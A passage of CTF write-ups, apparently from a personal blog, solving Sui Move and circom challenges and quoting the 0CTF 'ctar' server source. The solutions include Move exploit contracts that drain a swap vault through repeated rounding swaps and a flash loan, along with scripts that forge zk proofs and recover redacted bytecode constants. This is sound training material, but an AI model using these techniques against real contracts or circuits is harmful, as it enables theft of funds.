815335940196924955981808193550, 980088874723074134145795909695, 1040350471929604504671667297293, 694306413856033832104987821225, 1100701148915109260220219397362, 861206885233154419043148976517, 876554683816312162465230697586, 1076923686440478606439365136720, 1107602068170190810465822909560, 1100902219684950305811682891430, 1009332208289062882998661101012, 967609782575367058780528699819, 847083579140405861838133952519, 960959937086001625649028920079, 705904760596273528708773247739, 988488072940508411593301577206, 855813607361058850034718734435, 923433147009426548286155351544, 927267999331166226154541562801, 833421857490492247367663980146, 913726313126985248790906682414, 1152739002690744639089937932044, 758241923243582267541395815418, 826183630101084916296521382931, 871183653161711616458012031543, 1118876419859306653014740242503, 925209067093127804911661688602, 796047972746266882548343051358, 1105317347573296959936900839504, 1032520332923337088078820581073, 790503191621237284611596729403, 1093888060891270134787133219999, 1129244151204837429536515955111, 736340764546413369555890340882, 844331877762673816004189096610, 1216403448409604941009786692773, 1026707098397380044704009977063, 1162146257113640418035057534747, 1239108677717284719224289951413, 1179642728157883101738427519029, 1121726694197132350252978011382, 1166236995314127503915531123371, 1237380820841327126465021125310, 928563984604088646801945637827, 969172329973162874760566309613, 916791337778690807774047076043, 1187392146940862931565053344747, 1041354841046252194695344517944]
    target_sum = 9639405868465735216305592265916

    for _ in range(1000):
        new_arr = []
        cnt = 0
        out = []
        for a in arr:
            if random.random() < 0.1:
                out.append(cnt)
                cnt += 1
                continue
            else:
                cnt += 1
                new_arr.append(a)
        attack = CJLOSSAttack(new_arr, target_sum).solve()
        if attack is not None and sum(attack) == 10:
            print(new_arr)
            print(attack)
            print(out)

module My::my {
    use sui::event;
    use sui::tx_context;
    use std::vector;
    use subset::subset_sum;

    struct Flag has copy, drop {
        user: address
    }

    struct Status has store, drop {
        status1: bool,
        status2: bool,
        status3: bool,
        user: address
    }

    const SUBSET1: vector<u256> = vector<u256>[1, 2, 3, 4, 5];
    const SUBSET1_k: u256 = 3;
    const SUBSET1_SUM: u256 = 10;

    const SUBSET2: vector<u256> = vector<u256>[657114161599166, 910496114410022, 688072175280628, 979125688929861, 785338725553848, 887159728265050, 622841641193103, 725154659875148, 740423950361799, 1112663190822550, 922195312967936, 1042436852643560, 794233930466363, 1005209504277475, 1095553790921575, 1100234031975913, 1097338706315892, 685173186787942, 931084447948631, 1025208692464347, 823246835986875, 640705587553065, 1067772094848338, 608307547370178, 860527574463312, 745522896700102, 1107646656429468, 575719789023353, 1008988042757401, 563072788255737, 882855688862943, 974319745991702, 1004427379286462, 904504413493231, 1083652042079152, 1053694822809090, 702717128907262, 881540236795119, 992204188883575, 890965906483327];
    const SUBSET2_k: u256 = 5;
    const SUBSET2_SUM: u256 = 4178919802453692;

    const SUBSET3: vector<u256> = vector<u256>[730983191275949878802706287425, 738747747182330870358722868390, 680758618870742741205069880873, 736839950200009681117675478653, 821817898783913524938769447793, 1062662929594640521216588473346, 804078432654564652353003934418, 987354119502628442223858924307, 974121064863569224403070119631, 766517359152261667697388282513, 1115664590742545309936719501477, 1254953696369781959586392455121, 708965201854329468418120106125, 803407590419087414384275360152, 680994772249007776444211943134, 1209641410992728376967530103489, 1022807828605992586908433214193, 708760513774702586605766399361, 1146510154260900723919247238072, 1071639493717448858831225830703, 704595551001390485227577881300, 666267842956106233584633761922, 916484600070887410197321230180, 869547011380359879465486127051, 1146284238922586539801525899580, 960791406315307372223215677265, 846714517434965788941098273736, 943109174072029103168835446476, 1186748483275224241752870865835, 810729587696497173434925395865, 1081140748486010470135469081647, 1117896979087650487375387404086, 815335940196924955981808193550, 980088874723074134145795909695, 1040350471929604504671667297293, 694306413856033832104987821225, 1100701148915109260220219397362, 861206885233154419043148976517, 876554683816312162465230697586, 1076923686440478606439365136720, 1107602068170190810465822909560, 1100902219684950305811682891430, 1009332208289062882998661101012, 967609782575367058780528699819, 847083579140405861838133952519, 960959937086001625649028920079, 705904760596273528708773247739, 988488072940508411593301577206, 855813607361058850034718734435, 923433147009426548286155351544, 927267999331166226154541562801, 833421857490492247367663980146, 913726313126985248790906682414, 1152739002690744639089937932044, 758241923243582267541395815418, 826183630101084916296521382931, 871183653161711616458012031543, 1118876419859306653014740242503, 925209067093127804911661688602, 796047972746266882548343051358, 1105317347573296959936900839504, 1032520332923337088078820581073, 790503191621237284611596729403, 1093888060891270134787133219999, 1129244151204837429536515955111, 736340764546413369555890340882, 844331877762673816004189096610, 1216403448409604941009786692773, 1026707098397380044704009977063, 1162146257113640418035057534747, 1239108677717284719224289951413, 1179642728157883101738427519029, 1121726694197132350252978011382, 1166236995314127503915531123371, 1237380820841327126465021125310, 928563984604088646801945637827, 969172329973162874760566309613, 916791337778690807774047076043, 1187392146940862931565053344747, 1041354841046252194695344517944];
    const SUBSET3_k: u256 = 10;
    const SUBSET3_SUM: u256 = 9639405868465735216305592265916;

    public entry fun attack(ctx: &mut tx_context::TxContext) {
        let status = subset_sum::get_status(ctx);
        let sol1 = vector<u256>[0,1,1,0,1];
        let sol2 = vector<u256>[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
        let sol3 = vector<u256>[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0];
        subset_sum::solve_subset1(sol1, &mut status);
        subset_sum::solve_subset2(sol2, &mut status);
        subset_sum::solve_subset3(sol3, &mut status);
        subset_sum::get_flag(&status, ctx);
    }

    public fun get_status(ctx: &mut tx_context::TxContext): Status {
        Status {
            status1: false,
            status2: false,
            status3: false,
            user: tx_context::sender(ctx)
        }
    }


    public fun get_flag(status: &Status, ctx: &mut tx_context::TxContext) {
        let user = tx_context::sender(ctx);
        assert!(status.user == user, 0);
        assert!(status.status1 && status.status2 && status.status3, 0);
        event::emit(Flag { user: user });
    }

}

swap

If a user keep swapping alternately from A to B and from B to A, the user will have more coin than the vault.

vault_a = 100
vault_b = 100

my_a = 10
my_b = 10

# swap

for _ in range(2):
    delta = min(int(my_a * vault_b / vault_a), vault_b)
    vault_a += my_a
    vault_b -= delta
    my_a = 0
    my_b += delta

    delta = min(int(my_b * vault_a / vault_b), vault_a)
    vault_b += my_b
    vault_a -= delta
    my_b = 0
    my_a += delta

delta = int(my_a * vault_b / vault_a)
vault_a += my_a
vault_b -= delta
my_a = 0
my_b += delta

delta = int(45 * vault_a / vault_b)
vault_b += 45
vault_a -= delta
my_b -= 45
my_a += delta

print(my_a)
print(my_b)
print(vault_a)
print(vault_b)

module My::my {
    use sui::coin::{Self, Coin, TreasuryCap};
    use sui::tx_context::{Self, TxContext};
    use sui::transfer;
    use sui::object::{Self, UID};
    use std::option;
    use swap::vault::{Self, Vault};
    use swap::ctfa::{Self, MintA};
    use swap::ctfb::{Self, MintB};

    public entry fun attack1<A,B>(capa: MintA<A>, capb: MintB<B>, ctx: &mut TxContext) {
        vault::initialize<A,B>(capa, capb ,ctx);
    }



    public entry fun attack2<A,B>(vault: &mut Vault<A,B>, coina:Coin<A>, coinb:Coin<B>, ctx: &mut TxContext) {
        let coin_b = vault::swap_a_to_b<A,B>(vault, coina, ctx);
        coin::join<B>(&mut coin_b, coinb);
        let coin_a = vault::swap_b_to_a<A,B>(vault, coin_b, ctx);
        let coin_b = vault::swap_a_to_b<A,B>(vault, coin_a, ctx);
        let coin_a = vault::swap_b_to_a<A,B>(vault, coin_b, ctx);
        let coin_b = vault::swap_a_to_b<A,B>(vault, coin_a, ctx);
        let coin_bb = coin::split(&mut coin_b, 45, ctx);
        let coin_a = vault::swap_b_to_a<A,B>(vault, coin_bb, ctx);

        let (a, b, r) = vault::flash<A,B>(vault, 90, true, ctx);

        vault::get_flag<A,B>(vault, ctx);

        vault::repay_flash<A,B>(vault, a, b, r);

        transfer::public_transfer(coin_a, tx_context::sender(ctx));
        transfer::public_transfer(coin_b, tx_context::sender(ctx));
    }

}

otterhub

There are three private repos in otterhub.
In particular, it is necessary to focus on the Matryoshka repo, and it has three commits.

161,28,235,11,6,0,0,0,7,1,0,2,3,2,5,5,7,1,7,8,21,8,29,32,6,61,178,1,12,239,1,17,0,0,0,1,0,0,0,0,9,101,110,99,114,121,112,116,111,114,10,115,116,111,114,101,95,98,97,98,121,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,10,2,86,85,10,13,6,28,54,125,70,69,108,29,59,13,71,80,83,84,87,108,40,70,6,95,89,95,49,18,125,70,69,108,29,59,78,4,80,83,84,87,108,40,70,69,28,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,0,1,0,0,0,3,6,3,0,0,0,0,0,0,0,1,2,0
161,28,235,11,6,0,0,0,7,1,0,2,3,2,5,5,7,26,7,33,21,8,54,32,6,86,89,12,175,1,141,1,0,0,0,1,0,0,0,0,10,10,2,10,2,10,2,7,10,2,10,2,10,2,6,10,2,7,10,2,3,10,2,1,2,9,101,110,99,114,121,112,116,111,114,10,115,116,111,114,101,95,98,97,98,121,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,0,1,0,0,1,54,6,1,0,0,0,0,0,0,0,12,8,64,2,0,0,0,0,0,0,0,0,12,9,7,0,12,0,10,8,14,0,65,2,35,4,36,5,12,13,9,12,3,7,0,12,1,7,0,12,2,11,3,14,1,10,8,66,2,20,14,2,10,8,6,1,0,0,0,0,0,0,0,23,66,2,20,29,68,2,11,8,6,1,0,0,0,0,0,0,0,22,12,8,5,4,13,9,12,7,7,0,12,5,14,5,12,6,7,0,12,4,11,7,11,6,14,4,65,2,6,1,0,0,0,0,0,0,0,23,66,2,20,68,2,2,0
161,28,235,11,6,0,0,0,7,1,0,2,3,2,5,5,7,1,7,8,21,8,29,32,6,61,178,1,12,239,1,17,0,0,0,1,0,0,0,0,9,101,110,99,114,121,112,116,111,114,10,115,116,111,114,101,95,98,97,98,121,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,89,95,49,13,39,64,2,104,29,59,13,71,80,83,84,87,108,40,70,6,95,89,95,49,18,12,2,11,1,7,11,26,29,59,13,71,80,83,84,87,78,125,0,1,0,0,0,3,6,3,0,0,0,0,0,0,0,1,2,0

I noticed the above data are move bytecodes because 161, 28, 235, 11 is a move bytecode signature.

// Move bytecode v6
module 0.encryptor {


public store_baby() {
B0:
        0: LdU64(3)
        1: Pop
        2: Ret
}

Constants [
        0 => vector<u8>: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" // interpreted as UTF8 string
        1 => vector<u8>: "
GPSTWl(F_Y_1}FEl;NPSTWl(FEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" // interpreted as UTF8 string    
]
}

// Move bytecode v6
module 0.encryptor {


public store_baby() {
L0:     loc0: vector<u8>
L1:     loc1: vector<u8>
L2:     loc2: vector<u8>
L3:     loc3: &mut vector<u8>
L4:     loc4: vector<u8>
L5:     loc5: vector<u8>
L6:     loc6: &vector<u8>
L7:     loc7: &mut vector<u8>
L8:     loc8: u64
L9:     loc9: vector<u8>
B0:
        0: LdU64(1)
        1: StLoc[8](loc8: u64)
        2: VecPack(2, 0)
        3: StLoc[9](loc9: vector<u8>)
B1:
        4: LdConst[0](Vector(U8): 55585858..)
        5: StLoc[0](loc0: vector<u8>)
        6: CopyLoc[8](loc8: u64)
        7: ImmBorrowLoc[0](loc0: vector<u8>)
        8: VecLen(2)
        9: Lt
        10: BrFalse(36)
B2:
        11: Branch(12)
B3:
        12: MutBorrowLoc[9](loc9: vector<u8>)
        13: StLoc[3](loc3: &mut vector<u8>)
        14: LdConst[0](Vector(U8): 55585858..)
        15: StLoc[1](loc1: vector<u8>)
        16: LdConst[0](Vector(U8): 55585858..)
        17: StLoc[2](loc2: vector<u8>)
        18: MoveLoc[3](loc3: &mut vector<u8>)
        19: ImmBorrowLoc[1](loc1: vector<u8>)
        20: CopyLoc[8](loc8: u64)
        21: VecImmBorrow(2)
        22: ReadRef
        23: ImmBorrowLoc[2](loc2: vector<u8>)
        24: CopyLoc[8](loc8: u64)
        25: LdU64(1)
        26: Sub
        27: VecImmBorrow(2)
        28: ReadRef
        29: Xor
        30: VecPushBack(2)
        31: MoveLoc[8](loc8: u64)
        32: LdU64(1)
        33: Add
        34: StLoc[8](loc8: u64)
        35: Branch(4)
B4:
        36: MutBorrowLoc[9](loc9: vector<u8>)
        37: StLoc[7](loc7: &mut vector<u8>)
        38: LdConst[0](Vector(U8): 55585858..)
        39: StLoc[5](loc5: vector<u8>)
        40: ImmBorrowLoc[5](loc5: vector<u8>)
        41: StLoc[6](loc6: &vector<u8>)
        42: LdConst[0](Vector(U8): 55585858..)
        43: StLoc[4](loc4: vector<u8>)
        44: MoveLoc[7](loc7: &mut vector<u8>)
        45: MoveLoc[6](loc6: &vector<u8>)
        46: ImmBorrowLoc[4](loc4: vector<u8>)
        47: VecLen(2)
        48: LdU64(1)
        49: Sub
        50: VecImmBorrow(2)
        51: ReadRef
        52: VecPushBack(2)
        53: Ret
}

Constants [
        0 => vector<u8>: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" // interpreted as UTF8 string
]
}

// Move bytecode v6
module 0.encryptor {


public store_baby() {
B0:
        0: LdU64(3)
        1: Pop
        2: Ret
}

Constants [
        0 => vector<u8>: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" // interpreted as UTF8 string
GPSTWN}" // interpreted as UTF8 stringXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY_1
]
}

The result of reversing follows as

module my::my {

    use std::vector;

    const FLAG: vector<u8> = vector<u8>[1];

    public fun store_baby() {
        let loc8 = 1;
        let loc9 = vector<u8>[];

        let loc0 = FLAG;
        while (loc8 < vector::length<u8>(&loc0)) {
            let loc3 = loc9;
            let loc1 = FLAG;
            let loc2 = FLAG;

            vector::push_back(&mut loc3, *vector::borrow<u8>(&loc1, loc8) ^ *vector::borrow<u8>(&loc2, loc8 - 1));
            loc8 = loc8 + 1;
        };

        let loc7 = loc9;
        let loc5 = FLAG;
        let loc6 = loc5;
        let loc4 = FLAG;

        vector::push_back(&mut loc7, *vector::borrow<u8>(&loc6, vector::length<u8>(&loc4)-1));

    }
}

I cons strings that are not redacted in the constants of the bytecodes.

data =  [161,28,235,11,6,0,0,0,7,1,0,2,3,2,5,5,7,1,7,8,21,8,29,32,6,61,178,1,12,239,1,17,0,0,0,1,0,0,0,0,9,101,110,99,114,121,112,116,111,114,10,115,116,111,114,101,95,98,97,98,121,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,10,2,86,85,10,13,6,28,54,125,70,69,108,29,59,13,71,80,83,84,87,108,40,70,6,95,89,95,49,18,125,70,69,108,29,59,78,4,80,83,84,87,108,40,70,69,28,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,0,1,0,0,0,3,6,3,0,0,0,0,0,0,0,1,2,0]
data2 = [161,28,235,11,6,0,0,0,7,1,0,2,3,2,5,5,7,26,7,33,21,8,54,32,6,86,89,12,175,1,141,1,0,0,0,1,0,0,0,0,10,10,2,10,2,10,2,7,10,2,10,2,10,2,6,10,2,7,10,2,3,10,2,1,2,9,101,110,99,114,121,112,116,111,114,10,115,116,111,114,101,95,98,97,98,121,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,0,1,0,0,1,54,6,1,0,0,0,0,0,0,0,12,8,64,2,0,0,0,0,0,0,0,0,12,9,7,0,12,0,10,8,14,0,65,2,35,4,36,5,12,13,9,12,3,7,0,12,1,7,0,12,2,11,3,14,1,10,8,66,2,20,14,2,10,8,6,1,0,0,0,0,0,0,0,23,66,2,20,29,68,2,11,8,6,1,0,0,0,0,0,0,0,22,12,8,5,4,13,9,12,7,7,0,12,5,14,5,12,6,7,0,12,4,11,7,11,6,14,4,65,2,6,1,0,0,0,0,0,0,0,23,66,2,20,68,2,2,0]
data3 = [161,28,235,11,6,0,0,0,7,1,0,2,3,2,5,5,7,1,7,8,21,8,29,32,6,61,178,1,12,239,1,17,0,0,0,1,0,0,0,0,9,101,110,99,114,121,112,116,111,114,10,115,116,111,114,101,95,98,97,98,121,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,10,2,86,85,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,89,95,49,13,39,64,2,104,29,59,13,71,80,83,84,87,108,40,70,6,95,89,95,49,18,12,2,11,1,7,11,26,29,59,13,71,80,83,84,87,78,125,0,1,0,0,0,3,6,3,0,0,0,0,0,0,0,1,2,0]


a = []
a = data[0x60:0xe5] + data3[0xe5:0x110]

ans = [a[-1]]

for i in range(1, len(a)):
    ans.append(a[-i] ^ ans[i - 1])
print(bytes(ans)[::-1])

zk2

pragma circom 2.1.0;

template Num2Bits(n) {
    signal input in;
    signal output out[n];
    var lc1=0;

    var e2=1;
    for (var i = 0; i<n; i++) {
        out[i] <-- (in >> i) & 1;
        out[i] * (out[i] -1 ) === 0;
        lc1 += out[i] * e2;
        e2 = e2+e2;
    }

    lc1 === in;
}

template LessThan(n) {
    assert(n <= 252);
    signal input in[2];
    signal output out;

    component n2b = Num2Bits(n+1);

    n2b.in <== in[0]+ (1<<n) - in[1];

    out <== 1-n2b.out[n];
}

template GreaterThan(n) {
    signal input in[2];
    signal output out;

    component lt = LessThan(n);

    lt.in[0] <== in[1];
    lt.in[1] <== in[0];
    lt.out ==> out;
}

template ZK2() {
    signal input x;
    signal input delta;    
    signal output y;    
    signal x_square;
    signal delta_square;

    component gt = GreaterThan(252);
    gt.in[0] <== 1;
    gt.in[1] <== x;
    gt.out === 0;

    x_square <== x * x;
    delta_square <== delta * delta;

    168700*x_square + delta_square === 1 + 168696 * x_square * delta_square;
    y <== delta;
}


component main = ZK2();

According to https://docs.circom.io/circom-language/basic-operators/

Field Elements
A field element is a value in the domain of Z/pZ, where p is the prime number set by default to

p = 21888242871839275222246405745257275088548364400416034343698204186575808495617.

As such, field elements are operated in arithmetic modulo p.

The circom language is parametric to this number, and it can be changed without affecting the rest of the language (using GLOBAL_FIELD_P).

The challenge requries us to solve 168700*x_square + delta_square === 1 + 168696 * x_square * delta_square
We can find a solution using sage script.

p=21888242871839275222246405745257275088548364400416034343698204186575808495617
F=GF(p)
x=F(255)
xs=x^2
ds=4*x^2/(168696*x^2-1)+1
d=ds.sqrt()
assert 168700*xs+ds==1+168696*xs*ds
print(d)

kitchen

This challenge consists of two stages: cook and recook. In order to retrieve the flag we need to solve them both.
To solve the cook stage we had to construct some structs and pass them over to the cook() function.

let olive_oil = Olive_oil{
    amount: 0x15a5,
};

let olive_oil2 = Olive_oil{
    amount: 0xb8a6,
};

let olive_oil3 = Olive_oil{
    amount: 0xf8c9,
};

let olive_oil4 = Olive_oil{
    amount: 0x46bb,
};

let yeast = Yeast{
    amount: 0x00bd,
};

let yeast2 = Yeast{
    amount: 0x9d99,
};

let yeast3 = Yeast{
    amount: 0x7eb7,
};

let flour = Flour{
    amount: 0x8ad7,
};

let flour2 = Flour{
    amount: 0x84fa,
};

let flour3 = Flour{
    amount: 0xf2b8,
};

let salt = Salt{
    amount: 0xc5f1,
};

let salt2 = Salt{
    amount: 0x22e1,
};

To solve the recook stage we had to create a dummy function which calls the recook() function with dummy parameters and the add a debug message to leak the value for the out parameter.

#[test]
fun dump_code_test(){
    let status = Status {
        status1: false,
        status2: false,
        user: @0x0,
    };
    let out: vector<u8> = vector::empty<u8>();
    recook(out, &mut status);
}

The code is [debug] 0x06d9b954eb6892f7c5eca184d00400bd81fc9d997eb705c7dc7acc198fb1966d8a03018bc5f1ecc6
After that we only had to call the get_flag() function.

easygame

We need to provide an array of numbers that concatenated to the list [1, 2, 4, 5, 1, 3, 6, 7, 1, 5] and ran through the rob() function returns the value 22. To discover the numbers, I ran a simple brute-force.

#[test]
fun test_rob() {
    let houses = vector::empty<u64>();
    vector::push_back(&mut houses, 1);
    vector::push_back(&mut houses, 2);
    vector::push_back(&mut houses, 4);
    vector::push_back(&mut houses, 5);
    vector::push_back(&mut houses, 1);
    vector::push_back(&mut houses, 3);
    vector::push_back(&mut houses, 6);
    vector::push_back(&mut houses, 7);

    debug::print(&rob(&houses));

    let i = 1;
    let found = 1;
    while(i < 6) {
        let j = 0;
        while(j < 6) {
            vector::push_back(&mut houses, i);
            vector::push_back(&mut houses, j);
            let amount_robbed = rob(&houses);
            debug::print(&i);
            debug::print(&j);
            debug::print(&amount_robbed);
            if(amount_robbed == 22){
                debug::print(&houses);
                found = 1;
                break;
            };
            let _a = vector::pop_back(&mut houses);
            let _b = vector::pop_back(&mut houses);
            j = j + 1;
        };
        if(found == 1){
            break;
        };
        i = i + 1;
    };
}

Running the test will print:

[debug] [ 1, 2, 4, 5, 1, 3, 6, 7, 1, 5 ]

zk1

In order to solve this challenge we had to provide a proof that we know two numbers, both greater than one, whose product equals the value 58567186824402957966382507182680956225095467533943200425018625513920465170743. We could easily determin the factors using: http://factordb.com/index.php?query=58567186824402957966382507182680956225095467533943200425018625513920465170743
Then, following the sui zk tutorial, we were able to generate a proof using the following script:

use ark_bn254::Bn254;
use ark_circom::CircomBuilder;
use ark_circom::CircomConfig;
use ark_serialize::{CanonicalSerialize, CanonicalDeserialize};
use ark_groth16::{Groth16, ProvingKey};
use ark_snark::SNARK;
use rand;
use std::fs::File;

fn main() {
    let cfg = CircomConfig::<Bn254>::new("zk1.wasm", "zk1.r1cs").unwrap();

    let mut builder = CircomBuilder::new(cfg);
    builder.push_input("a", 223960747878782291107008135733958922391 as u128);
    builder.push_input("b", 261506479948451388126301943086863538273 as u128);

    let circom = builder.setup();

    let mut rng = rand::thread_rng();
    let mut file = File::open("key.bin").unwrap();
    let params = ProvingKey::<Bn254>::deserialize_compressed(&mut file).unwrap();

    let circom = builder.build().unwrap();

    let inputs = circom.get_public_inputs().unwrap();

    let proof = Groth16::<Bn254>::prove(&params, circom, &mut rng).unwrap();

    let pvk = Groth16::<Bn254>::process_vk(&params.vk).unwrap();
    let verified = Groth16::<Bn254>::verify_with_processed_vk(&pvk, &inputs, &proof).unwrap();
    println!("{:?}", verified);
    println!("{:?}", inputs);
    println!("{:?}", proof);

    let mut proof_inputs_bytes = Vec::new();
    inputs.serialize_compressed(&mut proof_inputs_bytes).unwrap();

    let mut proof_points_bytes = Vec::new();
    proof.a.serialize_compressed(&mut proof_points_bytes).unwrap();
    proof.b.serialize_compressed(&mut proof_points_bytes).unwrap();
    proof.c.serialize_compressed(&mut proof_points_bytes).unwrap();

    println!("{:#?}", proof_inputs_bytes);
    println!("{:#?}", proof_points_bytes);
}

2023 X-mas CTF (web3 - alpha hunter)

gss1 — Sun, 31 Dec 2023 23:58:49 +0900

My first ctf-challenge was released in dreamhack.

https://dreamhack.io/wargame/challenges/1060

Alpha Hunter

merry christmas Description 알파벳을 모아 MERRY CHRISTMAS를 완성해 주세요!! [RPC Usage] RPC: http://host:port/rpc GET FLAG: curl -X GET http://host:port/flag [Account Information] address: 0x377CFaD82A885Ef59C9243f715F33752804B1126 private key

dreamhack.io

https://dreamhack.io/wargame/writeups/14142

0CTF/TCTF 2023 - misc(ctar)

gss1 — Mon, 11 Dec 2023 19:37:19 +0900

chall

#!/usr/bin/python3
import os
import socketserver
import random
import signal
import string
import tempfile
import tarfile
from hashlib import sha256
from Crypto.Cipher import ChaCha20

from secret import flag,key

MAXNUM = 9
MAXFILESZ = 100
MAXTARSZ = 100000

class LicenseRequired(Exception):
	pass

class Task(socketserver.BaseRequestHandler):
    def proof_of_work(self):
        proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
        digest = sha256(proof.encode('latin-1')).hexdigest()
        self.request.send(str.encode("sha256(XXXX+%s) == %s\n" % (proof[4:],digest)))
        self.request.send(str.encode('Give me XXXX:'))
        x = self.request.recv(10).decode()
        x = x.strip()
        xx = x+proof[4:]
        if len(x) != 4 or sha256(xx.encode('latin-1')).hexdigest() != digest:
            return False
        return True

    def recvint(self):
        try:
            return int(self.request.recv(10))
        except:
            return 0

    def recvfile(self, maxsz):
        self.request.sendall(b"size: ")
        sz = self.recvint()
        assert sz < maxsz
        self.request.sendall(b"file(hex): ")
        r = 2*sz+1
        res = b''
        while r > len(res):
            res += self.request.recv(r)
        dat = bytes.fromhex(res.strip().decode('latin-1'))
        return dat

    def savefile(self, name, dat):
        fname = os.path.join(self.dir, name)
        with open(fname, "wb") as f:
            f.write(dat)
        self.request.sendall(f"[OK] {name} added\n".encode('latin-1'))

    def addsec(self):
        if len(self.data) > MAXNUM:
            self.request.sendall(b"[Error] too many secrets\n")
            raise LicenseRequired
        name = os.urandom(4).hex()
        self.data[name] = 1
        dat = self.recvfile(MAXFILESZ)
        self.savefile(name, dat)

    def upload(self):
        dat = self.recvfile(MAXTARSZ)
        c = ChaCha20.new(nonce=dat[:8], key=key)
        pt = c.decrypt(dat[8:])
        self.savefile("a.tar", pt)
        tname = os.path.join(self.dir, "a.tar")
        if not tarfile.is_tarfile(tname):
            self.request.sendall(b"[Error] not tar file\n")
            self.request.sendall(pt.hex().encode('latin-1')+b'\n')
            return
        f = tarfile.open(tname)
        cnt = 0
        for fname in f.getnames():
            if fname.startswith('/') or '..' in fname:
                self.request.sendall(b"[Error] you need a license to hack us\n")
                raise LicenseRequired
            cnt += 1
            if cnt > MAXNUM:
                break
        if len(self.data) + cnt > MAXNUM:
            self.request.sendall(b"[Error] too many files\n")
            raise LicenseRequired
        for fname in f.getnames():
            self.data[fname] = 1
        f.extractall(path=self.dir)
        os.unlink(tname)
        self.request.sendall(b"[OK] upload succeeded\n")

    def readsec(self):
        raise LicenseRequired

    def download(self):
        nonce = True
        for name in self.data:
            if self.data[name] == 0:
                nonce = False
        fname = os.path.join(self.dir, "a.tar")
        with tarfile.open("a.tar", 'w') as f:
            for name in self.data:
                f.add(name)
        with open(fname, 'rb') as f:
            cont = f.read()
        c = ChaCha20.new(key=key)
        dat = c.encrypt(cont)
        if nonce:
            dat = c.nonce+dat
        self.request.sendall(f"[OK] ctar file size: {len(dat)}\n".encode('latin-1'))
        self.request.sendall(dat.hex().encode('latin-1')+b'\n')

